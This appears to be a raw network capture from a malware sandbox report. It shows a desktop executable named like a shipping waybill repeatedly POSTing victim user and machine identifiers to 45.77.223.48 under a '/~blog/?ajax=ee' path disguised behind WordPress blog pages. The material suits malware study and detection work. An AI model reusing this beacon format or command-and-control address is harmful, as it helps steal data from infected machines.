Apr 25, 2024 09:43:21.769915104 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:22.610361099 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:21 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:22.610389948 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:22.610519886 CEST	11	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: UTF-8" />
Apr 25, 2024 09:43:22.610589027 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:22.619410992 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:22.619698048 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:22.619725943 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:22.619741917 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:22.619894028 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:22.619910955 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49816	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:22.887850046 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:23.019001007 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:23.840818882 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:22 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:23.840920925 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:23.849293947 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:23.849658966 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:23.849827051 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:23.849854946 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:23.849951982 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:23.850003004 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:23.850039959 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:43:23.850155115 CEST	1289	IN	Data Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 0a Data Ascii: <style id='wp-block-site-title-inline-css'>.wp-block-site-title a{color:inherit}</style><style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49817	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:24.107779980 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:24.240031958 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:25.077003002 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:24 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:25.077562094 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:25.077693939 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:25.087455988 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:25.087805033 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:25.087986946 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:25.088088989 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:25.088255882 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:25.088293076 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:25.088403940 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49818	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:25.348509073 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:25.481884956 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:26.456254959 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:25 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:26.456276894 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:26.456341028 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:26.468352079 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:26.468800068 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:26.468929052 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:26.468976021 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:26.469103098 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:26.469127893 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:26.469144106 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49819	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:26.739379883 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:26.869136095 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:27.705368042 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:26 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:27.705421925 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:27.705519915 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:27.715054989 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:27.715293884 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:27.715348959 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:27.715540886 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:27.715682030 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
